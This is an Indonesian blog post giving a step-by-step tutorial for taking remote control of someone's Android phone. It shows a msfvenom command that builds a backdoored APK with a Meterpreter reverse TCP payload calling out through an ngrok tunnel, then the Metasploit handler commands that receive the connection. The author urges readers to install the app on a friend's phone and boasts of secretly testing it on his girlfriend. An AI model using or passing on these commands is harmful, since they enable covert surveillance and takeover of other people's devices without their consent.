Iklan Tengah Artikel 2

Hack Android Beda Jaringan Part II terbaru

 selamat siang guys,kali ini ane ingin berbagi tutorial tentang cara meremote android jarak jauh. oke langsung saja kita siapkan alat dan bahan-bahannya.
  1. install ngrok(portable tinggal pake aja). Klik Disini
  2. daftar akun ngrok Klik disini
  3. install authtokennya yang di dapat
kalau sudah siap semua kita akan mulai,langsung saja:
  1. jalankan ngroknya, buka dari terminal dimana anda mengextrack nya
  2. tunggu sampai online
    yang saya kotakin merah itu port yang kita gunakan nanti untuk backdoornya. terus yang saya kasih warna hijau itu untuk LHOST nya pada backdor (yang warna hijau itu tcp://0.exkjhtl.ngrok.io).
  3. sekarang kita akan buat backdoornya. ini command nya msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15838 R>testNgrok.apk
  4. selanjutnya kalian cari targetnya,usahakan temennya yg jauh. kalau ane kmaren buat test pacar ane. untung orangnya kagak tau hehehe :v  kalian install aplikasi backdoor tdi di target.
  5. setelah itu kalian buka terminal lagi, service posgresql start
    setelah itu baru msfconsole
  6. setelah metasploit terbuka, kita jalan komen seperti biasa. use exploit/multi/handler kemudian enter
  7. set payload android/meterpreter/reverse_tcp kemudian enter
  8. set LHOST 0.0.0.0
  9. set LPORT 4444
  10. exploit
  11. tinggal tunggu aja bro
jika kalian masih bingung,kalian bisa bertanya ke saya atau kalian bisa liat video ane yang ini

kalau kalian bingung hubugi saya di facebook,kalau ada kesempatan saya akan ajarkan kalian step by stepnya.
sekian tutorial dari saya,resiko ditanggung penumpang.

0 Response to "Hack Android Beda Jaringan Part II terbaru"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel